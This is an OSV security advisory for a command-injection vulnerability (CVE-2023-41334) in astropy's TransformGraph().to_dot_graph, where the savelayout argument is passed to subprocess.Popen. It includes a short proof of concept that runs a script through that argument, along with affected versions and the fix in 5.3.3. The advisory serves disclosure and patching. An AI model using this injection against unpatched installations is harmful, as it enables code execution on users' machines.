GHSA-h2x6-5jx5-46hf
Suggest an improvement- Source
- https://github.com/advisories/GHSA-h2x6-5jx5-46hf
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/03/GHSA-h2x6-5jx5-46hf/GHSA-h2x6-5jx5-46hf.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-h2x6-5jx5-46hf
- Aliases
- Published
- 2024-03-18T20:26:33Z
- Modified
- 2024-03-18T22:01:24.519493Z
- Severity
-
- 8.4 (High) CVSS_V3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- Summary
- RCE in TranformGraph().to_dot_graph function
- Details
-
Summary
RCE due to improper input validation in TranformGraph().todotgraph function
Details
Due to improper input validation a malicious user can provide a command or a script file as a value to
savelayoutargument, which will be placed as the first value in a list of arguments passed tosubprocess.Popen. https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539 Although an error will be raised, the command or script will be executed successfully.PoC
$ cat /tmp/script #!/bin/bash echo astrorce > /tmp/poc.txt$ python3 Python 3.9.2 (default, Feb 28 2021, 17:03:44) [GCC 10.2.1 20210110] on linux Type "help", "copyright", "credits" or "license" for more information. >>> from astropy.coordinates.transformations import TransformGraph >>> tg = TransformGraph() >>> tg.to_dot_graph(savefn="/tmp/1.txt", savelayout="/tmp/script") Traceback (most recent call last): File "<stdin>", line 1, in <module> File "/home/u32i/.local/lib/python3.9/site-packages/astropy/coordinates/transformations.py", line 584, in to_dot_graph stdout, stderr = proc.communicate(dotgraph) File "/usr/lib/python3.9/subprocess.py", line 1134, in communicate stdout, stderr = self._communicate(input, endtime, timeout) File "/usr/lib/python3.9/subprocess.py", line 1961, in _communicate input_view = memoryview(self._input) TypeError: memoryview: a bytes-like object is required, not 'str' >>>$ cat /tmp/poc.txt astrorceImpact
code execution on the user's machine
- Database specific
{ "nvd_published_at": "2024-03-18T19:15:05Z", "cwe_ids": [ "CWE-74", "CWE-77" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-03-18T20:26:33Z" }- References
-
- https://github.com/astropy/astropy/security/advisories/GHSA-h2x6-5jx5-46hf
- https://nvd.nist.gov/vuln/detail/CVE-2023-41334
- https://github.com/astropy/astropy/commit/22057d37b1313f5f5a9b5783df0a091d978dccb5
- https://github.com/astropy/astropy
- https://github.com/astropy/astropy/blob/9b97d98802ee4f5350a62b681c35d8687ee81d91/astropy/coordinates/transformations.py#L539
Affected packages
PyPI / astropy
Package
- Name
- astropy
- View open source insights on deps.dev
- Purl
- pkg:pypi/astropy
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedFixed5.3.3
Affected versions
0.*
0.1
0.2
0.2.1
0.2.2
0.2.3
0.2.4
0.2.5
0.3
0.3.1
0.3.2
0.4rc1
0.4rc2
0.4
0.4.1
0.4.2
0.4.3
0.4.4
0.4.5
0.4.6
1.*
1.0rc1
1.0rc2
1.0
1.0.1
1.0.2
1.0.3
1.0.4
1.0.5
1.0.6
1.0.7
1.0.8
1.0.9
1.0.10
1.0.11
1.0.12
1.0.13
1.1b1
1.1rc1
1.1rc2
1.1
1.1.post1
1.1.post2
1.1.1
1.1.2
1.2rc1
1.2
1.2.1
1.2.2
1.3rc1
1.3
1.3.1
1.3.2
1.3.3
2.*
2.0rc1
2.0
2.0.1
2.0.2
2.0.3
2.0.4
2.0.5
2.0.6
2.0.7
2.0.8
2.0.9
2.0.10
2.0.11
2.0.12
2.0.13
2.0.14
2.0.15
2.0.16
3.*
3.0rc1
3.0rc2
3.0
3.0.1
3.0.2
3.0.3
3.0.4
3.0.5
3.1rc1
3.1rc2
3.1
3.1.1
3.1.2
3.2rc1
3.2rc2
3.2
3.2.1
3.2.2
3.2.3
4.*
4.0rc1
4.0rc2
4.0
4.0.1
4.0.1.post1
4.0.2
4.0.3
4.0.4
4.0.5
4.0.6.dev27461
4.0.6
4.1rc1
4.1rc2
4.1
4.2rc1
4.2
4.2.1
4.3rc1
4.3
4.3.post1
4.3.1
5.*
5.0rc1
5.0rc2
5.0
5.0.1
5.0.2
5.0.3
5.0.4
5.0.5
5.0.6
5.0.7
5.0.8
5.1rc1
5.1
5.1.1
5.2.dev0
5.2rc1
5.2
5.2.1
5.2.2
5.3rc1
5.3
5.3.1
5.3.2